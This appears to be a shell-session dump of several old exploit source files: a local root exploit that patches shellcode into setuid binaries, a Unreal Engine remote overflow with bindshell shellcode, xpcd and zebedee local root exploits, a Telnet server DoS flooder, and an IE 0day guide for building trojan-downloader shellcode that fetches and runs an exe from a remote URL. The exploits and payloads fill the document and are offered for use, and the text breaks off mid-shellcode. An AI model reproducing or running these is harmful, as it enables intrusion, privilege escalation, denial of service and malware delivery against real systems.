{"/usr/bin/lock"},
{"/usr/bin/login"},
{"/usr/bin/passwd"},
{"/usr/bin/yppasswd"},
{"/usr/bin/quota"},
{"/usr/bin/rlogin"},
{"/usr/bin/rsh"},
{"/usr/bin/su"},
{"/usr/bin/crontab"},
{"/usr/bin/lpq"},
{"/usr/bin/lpr"},
{"/usr/bin/lprm"},
{"/usr/bin/k5su"},
{"/usr/libexec/sendmail/sendmail"},
{"/usr/libexec/uucp/uucico"},
{"/usr/libexec/uucp/uuxqt"},
{"/usr/sbin/mrinfo"},
{"/usr/sbin/mtrace"},
{"/usr/sbin/sliplogin"},
{"/usr/sbin/timedc"},
{"/usr/sbin/traceroute"},
{"/usr/sbin/traceroute6"},
{"/usr/sbin/ppp"},
{"/usr/sbin/pppd"},
{"/usr/src/usr.sbin/cron/crontab/crontab"},
{"/usr/X11R6/bin/xterm"},
{"/usr/home/bww/shell/sh"},
{"/bin/rcp"},
{"/sbin/ping"},
{"/sbin/ping6"},
{"/sbin/route"},
{"/sbin/shutdown"},
{NULL,}
};
#define SLIPTIME 5
#define PATT_SIZE 16
#define MAP_NOPAGE 1
#define MAP_ISPAGE 2
char sush[]= "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
"\x00\x80\x04\x08\x5c\x00\x00\x00\x5c\x00\x00\x00\x05\x00\x00\x00"
"\x00\x00\x00\x00\x31\xc0\x50\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
"\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
extern int errno;
jmp_buf jmp;
struct sigaction osigbus,osigsegv;
void sigsegv(int signo, siginfo_t * si, void * ptr)
{
int error_code = MAP_NOPAGE;
longjmp(jmp, error_code);
}
void prepare(void)
{
struct sigaction sa;
sa.sa_sigaction = sigsegv;
sa.sa_flags = SA_SIGINFO | SA_NODEFER;
sigemptyset(&sa.sa_mask);
sigaction(SIGBUS, &sa, &osigbus);
sigaction(SIGSEGV,&sa, &osigsegv);
}
void unprepare(void)
{
sigaction(SIGBUS,&osigbus,NULL);
sigaction(SIGSEGV,&osigsegv,NULL);
}
int testaddr(unsigned addr)
{
int val;
val = setjmp(jmp);
if (val == 0) {
asm ("verr (%%eax)" : : "a" (addr));
return MAP_ISPAGE;
}
return val;
}
int testaddw(unsigned addr)
{
int val;
val = setjmp(jmp);
if (val == 0) {
asm ("verw (%%eax)" : : "a" (addr));
return MAP_ISPAGE;
}
return val;
}
unsigned int dump_mem (char *a,unsigned int size,char *fname )
{
int coun;
int was_bus=1;
FILE *fh;
int i;
unsigned int elf_start=0;
unsigned int start_addr,end_addr;
printf ("DUMP MEM %08x\n",a);
prepare ();
fh=fopen(fname,"w");
for(coun=0;coun<size;coun+=PSIZE) {
if (testaddr((unsigned)(a+coun)) == MAP_ISPAGE &&
testaddw((unsigned)(a+coun)) == MAP_ISPAGE) {
if (was_bus==1) {
was_bus=0;
start_addr=(unsigned int)(a+coun);
printf("Page a 0x%08x-",(unsigned)(a+coun));
}
fwrite(a+coun,1,PSIZE,fh);
} else {
if (was_bus==0) {
was_bus=1;
end_addr=(unsigned int)(a+coun-1);
printf("0x%08x\n",(unsigned)(a+coun-1));
for (i=start_addr;i<end_addr-PATT_SIZE;i++) {
if (memcmp((void*)i,sush,PATT_SIZE)==0) {
printf("GOTCHA WE VGOT ELF\n");
elf_start=i;
break;
}
}
}
}
}
if (was_bus==0) {
was_bus=1;
end_addr=(unsigned int)(a+coun-1);
printf("0x%08x\n",(unsigned)(a+coun-1));
for (i=start_addr;i<end_addr-PATT_SIZE;i++) {
if (memcmp((void*)i,sush,PATT_SIZE)==0) {
printf("GOTCHA WE VGOT ELF\n");
elf_start=i;
break;
}
}
}
fclose(fh);
unprepare();
return elf_start;
}
main()
{
key_t key;
int shmid,i;
char a;
char *argv[4],*envp[1];
unsigned int l=0;
char *ptr1,*ptr2,addr;
char work=0;
pid_t pid;
unsigned int elf_start;
int fh;
envp[0]=NULL;
srand(time(NULL));
key = 5678+rand()%1000;
printf ("USE KEY %i\n",key);
shmid = shmget(key,SIZE, IPC_CREAT | 0777);
ptr1 = (char*)shmat(shmid,0,0);
printf("shmget - 0x%08x\n",(unsigned int)ptr1);
ptr2 = (char*)shmat(shmid,0,0);
printf("shmget - 0x%08x\n",(unsigned int)ptr2);
signal(SIGPROF,SIG_IGN);
//for (l=0;l<8;l++) {
for (l=0;l<0xffffffff-1;l++) {
if (l%1000000 == 0) {
printf("l = %08x\n",l);
}
shmat(shmid,(void*)0xc0000000,SHM_RND);
}
printf("DONE\n");/*
for (i=0;i<SIZE;i++) {
ptr1[i]=10;
}*/
shmdt(ptr2);
printf("Show Begins:\n");
/*shmctl(shmid,IPC_RMID,NULL);*/
// work=1;
i=0;
while(suids[i].file) {
fh=open(suids[i].file,O_RDONLY);
if (fh==-1) {
printf("File %s not found\n",suids[i].file);
i++;
continue;
}
addr=(unsigned)mmap(ptr1+SIZE*(i+3),SIZE,PROT_READ,MAP_FIXED,fh,0);
printf("File mapped at 0x%08x (%s)\n",addr,suids[i].file);
if (elf_start=dump_mem(ptr1,SIZE,"./after.txt")) {
printf ("EBAT TO LUSIYU: GOT ELF WE WILL FUCK IT %s\n",suids[i].file);
for (i=0;i<sizeof(sush);i++) {
*(char*)(elf_start+i)=sush[i];
}
break;
}
i++;
}
(char *)shmat(shmid,(void*)0xc0000000,SHM_RND);
(char *)shmat(shmid,(void*)0xc0000000,SHM_RND);
(char *)shmat(shmid,(void*)0xc0000000,SHM_RND);
printf("press Ctrl-c\n");
//while(1) {sleep(1);}
}
$ cat unreal.c
/*
http://lists.netsys.com/pipermail/full-disclosure/2004-June/022811.html
ae tio dablio
o server do unreal tournament ? o UCC.exe,
dos outros jogos eu nao sei... deve ser o mesmo
eu fiz o seguinte, abri o DOS, rodei o UCC assim...
ucc server -log=server.log
depois abri o ollydbg, fui em FILE > Attach e atachei o UCC que eu rodei
ai dei f9 (run), pra ele rodar o UCC.. porque quando vc d? o attach,
ele STOPA o programa que vc attachou.
ae roda o xploit, vai no olly, d? um alt+m (memory) , ctrl+b (search), e mete
90909090 pra procurar, ae ele vai achar nossos NOPS
fiz a funcao shell() pra fazer a conexao depois que o exploit tiver funcionando,
ai o cara nao precisa conectar com telnet, etc...
altera o shellcode pra connectback se preferir
ah, tem um porem, o EIP ficou com nullbyte 0x00xx..
http://www.metasploit.com/opcode_search.html?OS=Windows+XP&SP=SP1&FSELMETH=Common&FILES=ntdll.dll+kernel32.dll&TYPE=Register&REG=ecx
ai eu pensei em por o retaddr no ECX, mas daria na mesma, ele vai quebrar o meu PACKET por causa do 00,
e so vai mandar o que veio antes... ai pensei em fazer com tudo com return into libc
igual foi feito nos exploits de webdav (IIS5.0)..
da um look ae nos exploits, no inicio deles tem um textinho comentado, falando sobre
esse esquema do nullbyte no RETADDR
http://www.securityfocus.com/archive/1/316256
http://www.rs-labs.com/exploitsntools/rs_iis.c
qualquer coisa deixa msg no ICQ... abra?os!
VERY PRIV8!!! DO NOT DISTRIBUTE!!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
//#define WIN32
typedef unsigned char u_char;
typedef unsigned short u_short;
typedef unsigned int u_int;
typedef unsigned long u_long;
#ifdef WIN32
#define close closesocket
#include <errno.h>
#include <windows.h>
#pragma comment(lib, "ws2_32")
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define TIMEOUT 4
#define BUFF_MAXLEN 2048
#define NOPS 100
#define OFFS_ECX 32
#define OFFS_EIP 48
/* dont change it */
#define IPSQUERY "\\secure\\"
#define PADDING 12
#define RETADDR 0x12E1FC
/* port 4444 bindshell */
unsigned char shellcode[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";
#ifndef WIN32
void std_err(void)
{
perror("\r\n[-] fatal error\r\n");
exit(1);
}
#else
void std_err(void)
{
char *error;
switch (WSAGetLastError())
{
case 10004: error = "interrupted system call"; break;
case 10009: error = "bad file number"; break;
case 10013: error = "permission denied"; break;
case 10014: error = "bad address"; break;
case 10022: error = "invalid argument (not bind)"; break;
case 10024: error = "too many open files"; break;
case 10035: error = "operation would block"; break;
case 10036: error = "operation now in progress"; break;
case 10037: error = "operation already in progress"; break;
case 10038: error = "socket operation on non-socket"; break;
case 10039: error = "destination address required"; break;
case 10040: error = "message too long"; break;
case 10041: error = "protocol wrong type for socket"; break;
case 10042: error = "bad protocol option"; break;
case 10043: error = "protocol not supported"; break;
case 10044: error = "socket type not supported"; break;
case 10045: error = "operation not supported on socket"; break;
case 10046: error = "protocol family not supported"; break;
case 10047: error = "address family not supported by protocol family"; break;
case 10048: error = "address already in use"; break;
case 10049: error = "can't assign requested address"; break;
case 10050: error = "network is down"; break;
case 10051: error = "network is unreachable"; break;
case 10052: error = "net dropped connection or reset"; break;
case 10053: error = "software caused connection abort"; break;
case 10054: error = "connection reset by peer"; break;
case 10055: error = "no buffer space available"; break;
case 10056: error = "socket is already connected"; break;
case 10057: error = "socket is not connected"; break;
case 10058: error = "can't send after socket shutdown"; break;
case 10059: error = "too many references, can't splice"; break;
case 10060: error = "connection timed out"; break;
case 10061: error = "connection refused"; break;
case 10062: error = "too many levels of symbolic links"; break;
case 10063: error = "file name too long"; break;
case 10064: error = "host is down"; break;
case 10065: error = "no route to Host"; break;
case 10066: error = "directory not empty"; break;
case 10067: error = "too many processes"; break;
case 10068: error = "too many users"; break;
case 10069: error = "disc quota exceeded"; break;
case 10070: error = "stale NFS file handle"; break;
case 10091: error = "network subsystem is unavailable"; break;
case 10092: error = "winsock dll Version out of range"; break;
case 10093: error = "successful WSASTARTUP not yet performed"; break;
case 10071: error = "too many levels of remote in path"; break;
case 11001: error = "host not found"; break;
case 11002: error = "non-authoritative Host not found"; break;
case 11003: error = "non-recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\r\n [-] error: %s\n", error);
exit(1);
}
void shell(int sock)
{
int l;
char buf[512];
fd_set rfds;
while (1)
{
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds))
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
fprintf(stdout, "\r\n [-] connection closed by local user\r\n");
exit(1);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds))
{
l = read (sock, buf, sizeof (buf));
if (l == 0)
{
fprintf(stdout, "\r\n [-] connection closed by local user\r\n");
exit(1);
}
else if (l < 0)
{
fprintf(stdout, "\r\n [-] read failure\r\n");
exit(1);
}
write(1, buf, l);
}
}
}
#endif
int timeout(u_int sock)
{
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if (err < 0) std_err();
if (!err) return -1;
return 0;
}
u_long resolv(char *host)
{
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if (host_ip == INADDR_NONE)
{
hp = gethostbyname(host);
if (!hp)
{
fprintf(stdout, " [-] unable to resolve hostname (%s)\r\n", host);
exit(1);
}
else host_ip = *(u_long *)hp->h_addr;
}
return host_ip;
}
void gs_info_udp(u_long ip, u_short port)
{
struct sockaddr_in peer;
int sd, err, psz, nt = 1;
u_char buff[2048], *p1, *p2;
peer.sin_addr.s_addr = ip;
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sd < 0) std_err();
if (sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, psz) < 0) std_err();
if (timeout(sd) < 0)
{
fprintf(stdout, " [-] socket timeout, no replies received. probably the server doesn't support the gamespy query protocol or the port is wrong\r\n\r\n");
close(sd);
exit(1);
}
err = recvfrom(sd, buff, sizeof(buff) - 1, 0, (struct sockaddr *)&peer, &psz);
if (err < 0) std_err();
buff[err] = 0x00;
p1 = buff;
while (1)
{
p2 = strchr((char *)p1, '\\');
if (!p2) break;
*p2 = 0x00;
if (!nt)
{
fprintf(stdout, "%16s: ", p1);
nt++;
}
else
{
fprintf(stdout, "%s\n", p1);
nt = 0;
}
p1 = p2 + 1;
}
fprintf(stdout, "%s\n\n", p1);
close(sd);
}
int main(int argc, char **argv)
{
int sd, len, psz, i;
u_long ret, nxhop;
u_short port;
u_char buff[BUFF_MAXLEN + 1];
u_char jmp[5], packet[1000];
struct sockaddr_in peer;
#ifdef WIN32
WSADATA wsaData;
WSAStartup(MAKEWORD(2,1), &wsaData);
#endif
setbuf(stdout, NULL);
fprintf(stdout, "\r\n Unreal Engine (IpServer) remote exploit w32/x86\r\n\r\n");
if (argc < 3)
{
fprintf(stdout, " (usage) %s <server> <query_port>\r\n", argv[0]);
exit(1);
}
port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
fprintf(stdout, " (target) %s\r\n", inet_ntoa(peer.sin_addr));
fprintf(stdout, " (port) %hu\r\n", port);
fprintf(stdout, " (informations)\r\n");
gs_info_udp(peer.sin_addr.s_addr, port);
// xor ?
ret = RETADDR; // RETADDR ^ 0xFFFFFFFF;
jmp[0] = (ret & 0x000000ff);
jmp[1] = (ret & 0x0000ff00) >> 8;
jmp[2] = (ret & 0x00ff0000) >> 16;
jmp[3] = (ret & 0xff000000) >> 24;
jmp[4] = 0;
nxhop = strlen(IPSQUERY);
memcpy(packet, IPSQUERY, nxhop);
memset(packet+nxhop, 0x41, (OFFS_ECX - nxhop));
nxhop = OFFS_ECX;
memset(packet+nxhop, 'X', 4);
nxhop += 4;
memset(packet+nxhop, 'A', PADDING);
memcpy(packet+OFFS_EIP, jmp, 4);
nxhop = OFFS_EIP + 4;
memset(packet+nxhop, 0x5C, 1);
nxhop += 1;
memset(packet+nxhop, 0x90, NOPS);
nxhop += NOPS;
memcpy(packet+nxhop, shellcode, strlen(shellcode));
nxhop += strlen(shellcode);
memset(packet+nxhop, 0, 1);
// the packet must be
// \secure\AAAAAAAAAAAAAAAAAAAAAAAAccccAAAAAAAAAAAArrrr\n..ns..s
// AAAA = garbage (yeah, only to alignment)
// cccc = ecx
// rrrr = retaddr,
// n..n = some nops
// s..s = shellcode
/*
if (packet[48] == 0 || packet[49] == 0 || packet[50] == 0 || packet[51] == 0)
{
fprintf(stderr, " [-] RET value contains null-byte\r\n");
exit(1);
}
*/
fprintf(stdout, " (exploiting) ");
if ((sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0 ) std_err();
if (sendto(sd, packet, sizeof(packet)-1, 0, (struct sockaddr *)&peer, psz) < 0) std_err();
if (timeout(sd) < 0)
{
fprintf(stdout, "yeahhh, enjoy it =)\r\n\r\n");
}
else
{
len = recvfrom(sd, buff, BUFF_MAXLEN, 0, (struct sockaddr *)&peer, &psz);
if (len < 0) std_err();
buff[len] = 0x00;
if (strstr((char *)buff, "validate"))
{
fprintf(stdout, "server doesn't seem vulnerable\r\n\r\n", stdout);
}
else
{
fprintf(stdout, "server doesn't support this query, so it's NOT vulnerable\r\n\r\n");
}
}
close(sd);
return(0);
}
$ cat unxpcd.c
/*
xpcd <= 2.09 local r00t exploit
by darkeagle
02.02.05
*/
#include <stdio.h>
#include <string.h>
char
shellcode[]=
// setreuid(0,0); Coded by ChoiX [unl0ck team]
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// execve /bin/sh
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// exit();
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80"; // int $0x80
int main(int argc, char *argv[])
{
char buf[1024];
long RET = 0x41424344;
char *path;
printf("\nxpcd local root exploit\nby Dark Eagle [GOTFault]\n\n");
if ( argc < 2 )
{
printf("usage: %s <path>\n", argv[0]);
exit(0);
}
path = argv[1];
RET = 0xbffffffa - strlen(shellcode) - strlen(path);
memset(buf, 'A', 284);
*(long*)&buf[284] = RET;
setenv("HOME", buf, 1);
setenv("SHELLCODE", shellcode, 1);
execl(path, path, NULL);
return 0;
=
$ cat un-D_0WNED.c
/*
1337 0day D0S exploit for latest version of
GoodTech Telnet Server for Windows NT/2000
bug found by darkeagle
16.03.05 at 11:30 am
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
int main(int argc, char **argv)
{
int i, err;
unsigned char mex[300000];
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WORD p;
p=MAKEWORD(2,0);
i = 0;
if ( argc < 2 ) { printf("\n\n 1337 0day D0S exploit for GoodTech Telnet Server for Windows NT/2000\n\n");
printf(" usage: %s <ip>\n\n", argv[0]);
exit(5);
}
printf("\n\n 1337 0day D0S exploit for GoodTech Telnet Server for Windows NT/2000\n\n");
for ( ;; ) {
WSAStartup(p,&data);
i++;
sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);
err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if(err<0){
printf("Server D_OWNED!!!!!!!!!\n", argv[1]);
break;
exit(-1);
}
memset(mex, 0x55, 55555);
printf("%d - Sending %d bytes.....\n", i, strlen(mex));
send(sock, mex , strlen(mex), 0);
closesocket(sock);
WSACleanup();
}
return 0;
}
$ cat undee.c
/*
zebedee <= 2.4.1 local sploit
by darkeagle
22.01.05
*/
#include <stdio.h>
#include <string.h>
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh"; // setuid(0); and exec(/bin/sh) code
int main(int argc, char *argv[])
{
long RET;
char *path;
char buf[14000];
if ( argc < 2 ) { printf("Zebedee local exploit by darkeagle\n\n"); printf("usage: %s <path>\n", argv[0]); exit(0); }
path = argv[1];
RET = 0xbffff910; // mandrake 10.0 OR
memset(buf, 0x00, sizeof(buf));
memset(buf, 0x43, 2000);
sprintf(buf+2000, "%s", shellcode);
*(long*)&buf[1052] = RET;
execl(path, path, buf, NULL);
return 0;
}
$ cd ie_0day/
$ ls
README.txt fuck.pl mafaka.html shellcode.txt
$ cat *
0day IE <= 6.0 SP1 Universal Exploit
mafaka.html downloads Notepad from site and execute it.
y0, dude, i wanna say you details "how to write trojan-downloader shellcode"
i have written shellcode for all win32 platforms.
see it's in UTF-16 format on Java-Script:
"%u0FEB"+"%u8058"+"%u1730"+"%u8140"+"%u6D38"+"%u3030"+"%u7521"+"%uEBF4"+"%uE805"+"%uFFEC"+
"%uFFFF%u94FE%u1716%u4A17%u2642%u73CC%u149C%u8457%u549C%u57E8"+
"%uEE62%u449C%u7114%uC526%uAF71%u0717%u9671%u5A2D%u634D%u3E10"+
"%uFED5%uE8E5%uE8E8%uC49E%u6D9C%u162B%u14C0%u6F48%u5C9C%u9C0F"+
"%u3764%u6C9C%u1633%u16C1%uEBC0%u16BA%u81C7%uEA90%u2646%u97DE"+
"%u18D6%uB1E4%u1D65%u4E81%uEA90%u0563%u5050%uF1F5%u18A9%u1717"+
"%u3E17%u3ED9%uFEE0%uE8FF%uE8E8%uD726%u9C71%uD610%u15F7%u649C"+
"%u160B%u16C1%uBAD1%uC716%uD19E%uC09E%u9A4A%uB792%u1717%u5717"+
"%u2F97%u6216%uD1ED%u1717%u929A%u170B%u1717%u4047%uC1E8%u137F"+
"%u1717%u7F17%u0717%u1717%u687F%u8F81%u7F17%u1717%u1717%uC7E8"+
"%u929E%u179A%u1717%u929A%u1718%u1717%u4047%uC1E8%u9A40%u429A"+
"%u1717%u4617%uC7E8%uD09E%u929A%u174A%u1717%u4047%uC1E8%uDE26"+
"%u4646%u4646%uE846%u9EC7%u9AD4%u7C92%u1717%u4717%uE840%u26C1"+
"%u46DE%u4646%u9A46%uB682%u1717%u4517%uE844%u9EC7%u9AD4%u6B92"+
"%u1717%u4717%uE840%u9AC1%u869A%u1717%u4617%u687F%u8F81%uE817"+
"%u9AA2%u1717%u4417%uC7E8%u9A48%u3E92%u1717%u4717%uE840%u7FC1"+
"%u1717%u1717%u8A9A%u1782%u1717%uE844%u9EC7%u9AD4%u2692%u1717"+
"%u4717%uE840%uE8C1%u86A2%u1717%uE817%u9AA2%u1717%u4417%uC7E8"+
"%u929A%u172E%u1717%u4047%uC1E8%uE844%u9AC7%u5692%u1717%u4717"+
"%uE840%u7FC1%u1712%u1717%u9A9A%u1782%u1717%uE846%u9AC7%u5E92"+
"%u1717%u4717%uE840%u7FC1%u1717%u1717%uC7E8%u6FFF%uE8E9%u50E8"+
"%u6372%u6547%u7478%u7356%u6573%u6472%u1764%u785B%u7376%u7E5B"+
"%u6575%u6576%u566E%u4117%u657E%u6263%u7B76%u7B56%u787B%u1774"+
"%u7B48%u6574%u7672%u1763%u7B48%u6560%u637E%u1772%u7B48%u7B74"+
"%u6478%u1772%u7E40%u5279%u726F%u1774%u6F52%u637E%u6547%u7478"+
"%u6472%u1764%u7E40%u5E79%u7279%u1763%u795E%u7263%u7965%u6372"+
"%u6758%u7972%u1756%u795E%u7263%u7965%u6372%u6758%u7972%u6542"+
"%u567B%u5E17%u6379%u6572%u7279%u4563%u7672%u5173%u7B7E%u1772"+
"%u1717%u1717%u1717%u1717%u277A%u3927%u6F72%u1772%u306D%u2130"+
"%u7468%u7074%u2f3a%u752f%u6c6e%u6330%u2e6b%u726f%u2f67%u6f6e%u6574%u6170%u2e64%u7865%u0165"
it's cutted from my download trojan shellcode.
it downloads file (notepad.exe) from http://unl0ck.org.
look at this:
"%u7468%u7074%u2f3a%u752f%u6c6e%u6330%u2e6b%u726f"+
"%u2f67%u6f6e%u6574%u6170%u2e64%u7865%u0165"
here is "http://unl0ck.org/notepad.exe"+"%u01" in UTF-16 on contrary shellcode :)
i.e. write your site like: http://trojan.com/virus.exe
save this data to any file. and open this file with any win32-hex-editor:
in C/C++ hex format it looks like this:
\x68\x74\x74\x70\x3A\x2F\x2F\x74\x72\x6F\x6A\x61\x6E\x2E\x63\x6F
\x6D\x2F\x76\x69\x72\x75\x73\x2E\x65\x78\x65
then you must add here \x01 byte. so result will be
\x68\x74\x74\x70\x3A\x2F\x2F\x74\x72\x6F\x6A\x61\x6E\x2E\x63\x6F
\x6D\x2F\x76\x69\x72\x75\x73\x2E\x65\x78\x65\x01
next you need replace all "\x" symbols with "%u" in any text-editor.
result will be like this:
%u68%u74%u74%u70%u3A%u2F%u2F%u74%u72%u6F%u6A%u61%u6E%u2E%u63%u6F
%u6D%u2F%u76%u69%u72%u75%u73%u2E%u65%u78%u65%u01
next you need save this data to file (only UTF-16 shellcode!!!). then look at
"fuck.pl" Perl script and correct some lines. 1st of all you need to correct
file open line.
open(FILE,"<file_to_open.txt");
put here file name.
next you need to corret characters in line.
i.e. in
%u68%u74%u74%u70%u3A%u2F%u2F%u74%u72%u6F%u6A%u61%u6E%u2E%u63%u6F
16 symbols of bytes.
see in perl script:
$r0,$r1,$r2,$r3,$r4,$r5,$r6,$r7,$r8,$r9,$r10,$r11,$r12,$r13,$r14,$r15
here is also 16 symbols of bytes.
so, then open you file with UTF-16 url in text editor and then
delete "%" in first byte of all next lines.
i.e. end result will be:
u68%u74%u74%u70%u3A%u2F%u2F%u74%u72%u6F%u6A%u61%u6E%u2E%u63%u6F
u6D%u2F%u76%u69%u72%u75%u73%u2E%u65%u78%u65%u01
next, put ur utf-16 url shellcode in directory of perl script. and do following command:
E:\Perl\bin>perl fuck.pl >result.txt
then open result.txt and you will see content like this:
%u74%u68%u70%u74%u2F%u3A%u74%u2F%u6F%u72%u61%u6A%u2E%u6E%u6F
%u63%u2F%u6D%u69%u76%u75%u72%u2E%u73%u78%u65%u01%u65
then convert it like in my code like:
%u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165
and now put instead
"%u7468%u7074%u2f3a%u752f%u6c6e%u6330%u2e6b%u726f"+
"%u2f67%u6f6e%u6574%u6170%u2e64%u7865%u0165"
ur code:
"%u7468%u7074%u2F3A%u742F%u6F72%u616A%u2E6E%u6F63%u2F6D%u6976%u7572%u2E73%u7865%u0165"
then save html and try to open file :)
so, end result of full shellcode will be:
"%u0FEB"+"%u8058"+"%u1730"+"%u8140"+"%u6D38"+"%u3030"+"%u7521"+"%uEBF4"+"%uE805"+"%uFFEC"+
"%uFFFF%u94FE%u1716%u4A17%u2642%u73CC%u149C%u8457%u549C%u57E8"+
"%uEE62%u449C%u7114%uC526%uAF71%u0717%u9671%u5A2D%u634D%u3E10"+
